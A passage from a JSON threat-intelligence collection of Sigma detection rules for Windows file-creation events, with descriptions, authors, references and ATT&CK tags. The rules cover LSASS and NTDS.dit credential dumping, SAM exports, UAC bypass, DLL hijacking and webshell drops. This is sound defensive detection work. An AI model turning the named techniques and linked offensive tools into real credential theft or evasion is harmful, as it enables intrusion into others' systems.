"Some tuning is required for other general purpose directories of third party apps" ], "filename": "file_event_win_susp_lnk_double_extension.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.007" ] }, "related": [ { "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", "value": "Suspicious LNK Double Extension File Created" }, { "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_dit_uncommon_parent_process.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "value": "NTDS.DIT Creation By Uncommon Parent Process" }, { "description": "Detects the creation of files with an executable or script extension by an Office application.", "meta": { "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_office_susp_file_extension.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml" ], "tags": [ "attack.t1204.002", "attack.execution" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "value": "File With Uncommon Extension Created By An Office Application" }, { "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", "meta": { "author": "elhoim", "creation_date": "2022-04-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_creation_by_mobsync.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" ], "tags": [ "attack.t1055", "attack.t1218", "attack.execution", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832", "value": "Created Files by Microsoft Sync Center" }, { "description": "Detects file creation events with filename patterns used by CrackMapExec.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-03-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_crackmapexec_indicators.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/CrackMapExec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_crackmapexec_indicators.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "736ffa74-5f6f-44ca-94ef-1c0df4f51d2a", "value": "HackTool - CrackMapExec File Indicators" }, { "description": "Detects the creation of files with scripting or executable extensions by Mysql daemon.\nWhich could be an indicator of \"User Defined Functions\" abuse to download malware.\n", "meta": { "author": "Joseph Kamau", "creation_date": "2024-05-27", "falsepositive": [ "Unknown" ], "filename": "file_event_win_mysqld_uncommon_file_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://asec.ahnlab.com/en/58878/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mysqld_uncommon_file_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c61daa90-3c1e-4f18-af62-8f288b5c9aaf", "value": "Uncommon File Creation By Mysql Daemon Process" }, { "description": "Detects files written by the different tools that exploit HiveNightmare", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-23", "falsepositive": [ "Files that accidentally contain these strings" ], "filename": "file_event_win_hktl_hivenightmare_file_exports.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/FireFart/hivenightmare/", "https://github.com/GossiTheDog/HiveNightmare", "https://twitter.com/cube0x0/status/1418920190759378944", "https://github.com/WiredPulse/Invoke-HiveNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001", "cve.2021-36934" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "value": "HackTool - Typical HiveNightmare SAM File Export" }, { "description": "Detects the creation of a macro file for Outlook.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_office_outlook_susp_macro_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "117d3d3a-755c-4a61-b23e-9171146d094c", "value": "Suspicious Outlook Macro Created" }, { "description": "Detects the creation of files with the \".rdp\" extensions in the temporary directory that Outlook uses when opening attachments.\nThis can be used to detect spear-phishing campaigns that use RDP files as attachments.\n", "meta": { "author": "Florian Roth", "creation_date": "2024-11-01", "falsepositive": [ "Whenever someone receives an RDP file as an email attachment and decides to save or open it right from the attachments" ], "filename": "file_event_win_office_outlook_rdp_file_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29", "https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/", "https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_rdp_file_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f748c45a-f8d3-4e6f-b617-fe176f695b8f", "value": ".RDP File Created by Outlook Process" }, { "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_dotnet_profiler.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", "value": "UAC Bypass Using .NET Code Profiler on MMC" }, { "description": "Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_recycle_bin_fake_exec.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca", "value": "Suspicious File Creation Activity From Fake Recycle.Bin Folder" }, { "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", "meta": { "author": "@pbssubhash", "creation_date": "2022-12-08", "falsepositive": [ "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "filename": "file_event_win_lsass_shtinkering.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f625", "value": "LSASS Process Dump Artefact In CrashDumps Folder" }, { "description": "Detects the creation of the default output filename used by the wmiexec tool", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-02", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_wmiexec_default_filename.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" ], "tags": [ "attack.lateral-movement", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "value": "Wmiexec Default Output File" }, { "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", "meta": { "author": "@sam0x90", "creation_date": "2022-07-30", "falsepositive": [ "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "filename": "file_event_win_iso_file_mount.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://twitter.com/Sam0x90/status/1552011547974696960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "value": "ISO File Created Within Temp Folders" }, { "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_spool_drivers_color_drop.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "value": "Drop Binaries Into Spool Drivers Color Folder" }, { "description": "Detects suspicious file type dropped by an Exchange component in IIS", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-04", "falsepositive": [ "Unknown" ], "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ "attack.persistence", "attack.t1190", "attack.initial-access", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", "value": "Suspicious File Drop by Exchange" }, { "description": "Detects the creation of the LiveKD driver, which is used for live kernel debugging", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "Legitimate usage of LiveKD for debugging purposes will also trigger this" ], "filename": "file_event_win_sysinternals_livekd_driver.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "16fe46bb-4f64-46aa-817d-ff7bec4a2352", "value": "LiveKD Driver Creation" }, { "description": "Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-02-04", "falsepositive": [ "Very unlikely" ], "filename": "file_event_win_hktl_dumpert.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "value": "HackTool - Dumpert Process Dumper Default File" }, { "description": "Detects the creation of an \"Active Directory Schema Cache File\" (.sch) file by an uncommon tool.", "meta": { "author": "xknow @xknow_infosec, Tim Shelton", "creation_date": "2019-03-24", "falsepositive": [ "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "filename": "file_event_win_adsi_cache_creation_by_uncommon_tool.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/fox-it/LDAPFragger", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml" ], "tags": [ "attack.t1001.003", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "value": "ADSI-Cache File Creation By Uncommon Tool" }, { "description": "Detects the creation of a new office macro files on the systems", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-23", "falsepositive": [ "Very common in environments that rely heavily on macro documents" ], "filename": "file_event_win_office_macro_files_created.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91174a41-dc8f-401b-be89-7bfc140612a0", "value": "Office Macro File Creation" }, { "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "creation_date": "2022-12-16", "falsepositive": [ "Unknown" ], "filename": "file_event_win_system32_local_folder_privilege_escalation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "07a99744-56ac-40d2-97b7-2095967b0e03", "value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique" }, { "description": "Detects the creation of hidden file/folder with the \"::$index_allocation\" stream. Which can be used as a technique to prevent access to folder and files from tooling such as \"explorer.exe\" and \"powershell.exe\"\n", "meta": { "author": "Scoubi (@ScoubiMtl)", "creation_date": "2023-10-09", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_susp_hidden_dir_index_allocation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", "https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/", "https://twitter.com/pfiatde/status/1681977680688738305", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a8f866e1-bdd4-425e-a27a-37619238d9c7", "value": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream" }, { "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", "meta": { "author": "frack113", "creation_date": "2022-04-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_get_variable.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.joesandbox.com/analysis/465533/0/html", "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" ], "tags": [ "attack.persistence", "attack.t1546", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "value": "Suspicious Get-Variable.exe Creation" }, { "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", "meta": { "author": "Tim Shelton", "creation_date": "2022-01-10", "falsepositive": [ "Unknown" ], "filename": "file_event_win_cscript_wscript_dropper.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "value": "WScript or CScript Dropper - File" }, { "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2022-06-19", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_susp_double_extension.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://twitter.com/luc4m/status/1073181154126254080", "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.007" ] }, "related": [ { "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "value": "Suspicious Double Extension Files" }, { "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" ], "tags": [ "attack.t1566", "attack.t1566.001", "attack.initial-access", "attack.t1574", "attack.t1574.001", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "value": "Potential Initial Access via DLL Search Order Hijacking" }, { "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-09", "falsepositive": [ "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "filename": "file_event_win_office_onenote_susp_dropped_files.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/", "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", "https://labs.withsecure.com/publications/detecting-onenote-abuse", "https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://twitter.com/MaD_c4t/status/1623414582382567424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "fcc6d700-68d9-4241-9a1a-06874d621b06", "value": "Suspicious File Created Via OneNote Application" }, { "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-23", "falsepositive": [ "Legitimate macro files downloaded from the internet", "Legitimate macro files sent as attachments via emails" ], "filename": "file_event_win_office_macro_files_downloaded.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml" ], "tags": [ "attack.initial-access", 